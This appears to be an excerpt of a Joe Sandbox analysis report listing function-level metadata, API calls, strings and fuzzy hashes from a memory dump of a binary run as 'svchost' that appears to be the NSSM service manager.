Instruction Fuzzy Hash: 271129B26042156BD71067AADC45FE7339CDF91369F004666FC29C72C0E6F8E8C08669

Function 004088E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00408909
PathFindExtensionW.SHLWAPI(?), ref: 00408927
__snwprintf_s.LIBCMT ref: 00408966
__snwprintf_s.LIBCMT ref: 0040898D

Strings

-%04u%02u%02uT%02u%02u%02u.%03u%s, xrefs: 00408952
%s%s, xrefs: 0040897A

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: __snwprintf_s$ExtensionFindPathSystemTime
String ID: %s%s$-%04u%02u%02uT%02u%02u%02u.%03u%s
API String ID: 104670371-3937541175
Opcode ID: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
Instruction ID: b79bb978c2d6968e54da41b461fb302b9f59bf9436526885e0c642140c4c9fbb
Opcode Fuzzy Hash: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
Instruction Fuzzy Hash: 6111B4B15143116ED334DB55DC41DBBB3E8EFC8B10F40892EB9A9C22D1EABC9580D7A5

Function 004051B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 004051DC
_memset.LIBCMT ref: 004051EB
CreateProcessW.KERNEL32 ref: 0040522C
TerminateProcess.KERNEL32(?,00000000), ref: 0040523D
GetLastError.KERNEL32 ref: 0040525A

Strings

D, xrefs: 00405224

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Process$CreateErrorFileLastModuleNameTerminate_memset
String ID: D
API String ID: 3492820992-2746444292
Opcode ID: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
Instruction ID: ec264b7909b663423e436220cfe4819a88d4f1dffac62785d33a99ea7066e5a1
Opcode Fuzzy Hash: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
Instruction Fuzzy Hash: B11154B1654300AFD320DB64DD46BEB77E4AF8C704F40482DB699D61D0EBB895488F96

Function 00415988 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00415994

Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441

__amsg_exit.LIBCMT ref: 004159B4
__lock.LIBCMT ref: 004159C4
InterlockedDecrement.KERNEL32(?), ref: 004159E1
InterlockedIncrement.KERNEL32(01302250), ref: 00415A0C

Strings

H*B, xrefs: 004159EB

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: H*B
API String ID: 4271482742-1987176958
Opcode ID: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
Instruction ID: 0f1790ebc6eee61fc3f291717e61b7ca4878fd8235e58e257555a432dd93126f
Opcode Fuzzy Hash: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
Instruction Fuzzy Hash: F2012B71A10B21EBC720AB25A4053DE77B0BF80724F01015BE804A3380C7BC99C2CBCE

Function 0040D300 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

lpDependencies, xrefs: 0040D3BF
get_service_dependencies(), xrefs: 0040D3BA

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: get_service_dependencies()$lpDependencies
API String ID: 0-219018013
Opcode ID: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
Instruction ID: 3e3e4e8d9a81c198e56250067319da3111a355b174864df4f52def3845c595e2
Opcode Fuzzy Hash: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
Instruction Fuzzy Hash: 3F51C1B19002019FD724DF99D880AA7B3F5FF94315F24492EE885972C1EB78E898CB95

Function 0040E350 Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
Instruction ID: 41e637edb1b435abd6f35276a328e9c15e151e7885b7bbb8ba59d22f3675d668
Opcode Fuzzy Hash: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
Instruction Fuzzy Hash: 9F21F4F2900200B7D710ABA6FC89FDB7B6CDF9935AF00403AFA48D6142E779D4558A79

Function 00405600 Relevance: 9.0, APIs: 6, Instructions: 40COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00405601
FindResourceExW.KERNEL32(00000000,00000005,?,?), ref: 00405616
GetLastError.KERNEL32(?,?), ref: 0040561C
FindResourceExW.KERNEL32(00000000,00000005,?,00000000,?,?), ref: 00405634
LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0040563D
CreateDialogIndirectParamW.USER32(00000000,00000000,?,?,?), ref: 00405659

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
String ID:
API String ID: 940021595-0
Opcode ID: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
Instruction ID: e476e4ad9c0365e054dca9b840df72f2dc216dd3d76c2c72e3c00f538e0b4bad
Opcode Fuzzy Hash: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
Instruction Fuzzy Hash: 24F09AB0708600BAE2505B64BC09FBB2768DBC4B12F408525F958D61C0EA78D8018E79

Function 00405820 Relevance: 9.0, APIs: 6, Instructions: 31COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000406), ref: 0040583A
EnableWindow.USER32(00000000), ref: 00405843
GetDlgItem.USER32(00000000,00000407), ref: 00405852
EnableWindow.USER32(00000000), ref: 00405855
GetDlgItem.USER32(00000000,00000408), ref: 00405864
EnableWindow.USER32(00000000), ref: 00405867

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: EnableItemWindow
String ID:
API String ID: 3833022359-0
Opcode ID: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
Instruction ID: 2ec9d1a14a3b6aefc49800d07f008e7303e744d1587428ffcda7d95d197ea67b
Opcode Fuzzy Hash: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
Instruction Fuzzy Hash: A8E012F2B0131476D520EBFA9CD8C97ABACEFC9A51B418815B74497050C979D502C778

Function 00411CB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

LocalSystem, xrefs: 00411CCE, 00411CFD, 00411D12, 00411DD3, 00411DEF, 00411E18

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem
API String ID: 0-3718507506
Opcode ID: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
Instruction ID: c55ad329f1ab7e7a319801d33323cd4f3fc7c6193fc44e9fe0b0950f6bea607c
Opcode Fuzzy Hash: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
Instruction Fuzzy Hash: 1C512A72E043405BD6205779BC45BD737989B81738F08063AFE65D73E1E72CEC8882AA

Function 0040FEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

__snwprintf_s.LIBCMT ref: 0040FF11

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040FF73

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498

Strings

service, xrefs: 0040FF35
pre_install_service(), xrefs: 0040FF30

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap__snwprintf_s$AllocFreeLocalProcess__vsnwprintf_s_l_vfwprintf
String ID: pre_install_service()$service
API String ID: 792397322-3337766052
Opcode ID: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
Instruction ID: 26704b136dc3d9749b1074aa21864745be87e0fb96ff5d59f0470137026c55c2
Opcode Fuzzy Hash: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
Instruction Fuzzy Hash: 614170B29003026BC710EA54DC82EA77354EF91318F14413FF914A72C2E63DF9598799

Function 00411090 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

_fwprintf.LIBCMT ref: 00411123

Strings

%s, xrefs: 00411115
( B, xrefs: 004110C7

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: _fwprintf
String ID: %s$( B
API String ID: 394020290-3552019876
Opcode ID: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
Instruction ID: 76538ebeed6a30712826624a3ba4fa343d335bada35abf236fb5f47343afded2
Opcode Fuzzy Hash: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
Instruction Fuzzy Hash: 8F313EB2A001007BD6109B766C45FAB775CDE85379F44053BFB58C3252EA28D885C67E

Function 00412582 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004125A4
__calloc_crt.LIBCMT ref: 004125BD

Strings

`'B, xrefs: 004125E9
P%B, xrefs: 00412626
$B, xrefs: 004125D4

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: __calloc_crt
String ID: P%B$`'B$$B
API String ID: 3494438863-3853432223
Opcode ID: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
Instruction ID: 1080d359621281dac9eb6ef5654e348f9a9ff66b954d09d266db2da5be3808d7
Opcode Fuzzy Hash: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
Instruction Fuzzy Hash: 3A11E73130461167E7348A2E7EA07E62393FB98324B94813FE601C73D0EAB8D8D3864C

Function 004160F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00416100

Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441

__getptd.LIBCMT ref: 00416117
__amsg_exit.LIBCMT ref: 00416125
__lock.LIBCMT ref: 00416135

Strings

x/B, xrefs: 00416142

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: x/B
API String ID: 3521780317-795736107
Opcode ID: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
Instruction ID: d97fba921eb6448607c153e5393f7921dba5c81f8b41dce901700528dcdb7151
Opcode Fuzzy Hash: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
Instruction Fuzzy Hash: DDF06231900210ABD620BB6995027CD73E0AF44729F52811FA58097393CB2CD9818A5E

Function 0040F286 Relevance: 7.7, APIs: 5, Instructions: 214threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000EBA0,?,00000000,00000000), ref: 0040F356
GetLastError.KERNEL32(00000000), ref: 0040F361
RtlWakeConditionVariable.NTDLL(?), ref: 0040F3D7
SetServiceStatus.ADVAPI32(?,?), ref: 0040F45A

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConditionCreateErrorLastServiceStatusThreadVariableWake
String ID:
API String ID: 1631654564-0
Opcode ID: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
Instruction ID: bb6d87cbd09c4234cba0dee68d7b7d15a758b73580d713f38b937c70a6fac446
Opcode Fuzzy Hash: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
Instruction Fuzzy Hash: 544196F2904700EAE774DB64EC4AB9777A89B54304F004D3EF24EA71C2D67DB8558B68

Function 004118D0 Relevance: 7.6, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 0041192C
HeapFree.KERNEL32(00000000), ref: 00411933

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
Instruction ID: 95e30e043aeee65d45f2ad13466b3714bbfccf5d3bd7e18b30c1f789b8d743ce
Opcode Fuzzy Hash: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
Instruction Fuzzy Hash: 802156B5A043006FD700DBA9DC85F9B77E8EBC8714F444A69F958C7290D678ED48C762

Function 004115B0 Relevance: 7.6, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 0041160C
HeapFree.KERNEL32(00000000), ref: 00411613

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
Instruction ID: b959b81e1fe3a2bafc76a74eee7c013ba47a19e295bb6f17c30615ef93d79162
Opcode Fuzzy Hash: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
Instruction Fuzzy Hash: 7A2156B5A043006BD600DBA9DC85F9B77E8EBC8714F444A6DF958C7290D678ED08C766

Function 00414190 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004141AE

Part of subcall function 004145CC: __mtinitlocknum.LIBCMT ref: 004145E2
Part of subcall function 004145CC: __amsg_exit.LIBCMT ref: 004145EE
Part of subcall function 004145CC: EnterCriticalSection.KERNEL32(?,?,?,0041267D,?), ref: 004145F6

___sbh_find_block.LIBCMT ref: 004141B9
___sbh_free_block.LIBCMT ref: 004141C8
HeapFree.KERNEL32(00000000,?,00420330,0000000C,00416422,00000000,?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C), ref: 004141F8
GetLastError.KERNEL32(?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C,004145E7,?,?,?,0041267D,?), ref: 00414209

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
Instruction ID: 78ddf74b6f23589f7df2c05dcf936a3b5e981393fab6882f78671dd489d308d8
Opcode Fuzzy Hash: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
Instruction Fuzzy Hash: A8018F31E41201AADB306BA29C0ABCE7BA49F81769F51425FF404A6191CB7C8AC1CA9C

Function 0040A460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

kill_process, xrefs: 0040A507, 0040A53E

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: kill_process
API String ID: 0-4017559064
Opcode ID: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
Instruction ID: 00686baf9cae64c418d2207327e1e792f3237e2728e58617ed409f1897315a47
Opcode Fuzzy Hash: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
Instruction Fuzzy Hash: 53317675504300AED711DA29AC45BE7B7D8BF84718F44893EED98622C1E3BCEA18C697

Function 004087E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040880C

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,00000000), ref: 0040884B

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

delete_createfile_parameter(), xrefs: 0040881A
%s%s, xrefs: 004087FE

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeleteDeregisterRegisterReportValue__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$delete_createfile_parameter()
API String ID: 1707313777-3045456684
Opcode ID: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
Instruction ID: d1234627bce7d3409ed959c761f7b8d746fd5414b944bb09aaf7c4e8fca72bae
Opcode Fuzzy Hash: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
Instruction Fuzzy Hash: 6201DFB2A142006FE700A759CD02FEFB7E8AB99714F80051EF615D72D1F5B8A8818BD6

Function 00401070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON

Download Yara Rule

Strings

LocalSystem, xrefs: 00401088
NT Authority\LocalService, xrefs: 0040109C

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem$NT Authority\LocalService
API String ID: 0-2498893882
Opcode ID: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
Instruction ID: 5088a37f203b1a9eb05045d2fec1edf7ec2d004d2db4fae365a24f9b45aa7680
Opcode Fuzzy Hash: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
Instruction Fuzzy Hash: 35E0483179452A62DB212B2CBC05FD727995B45742F448073B450DB1D2D75CCDC352ED

Function 004160B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 004160C8

Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FA0
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FAD
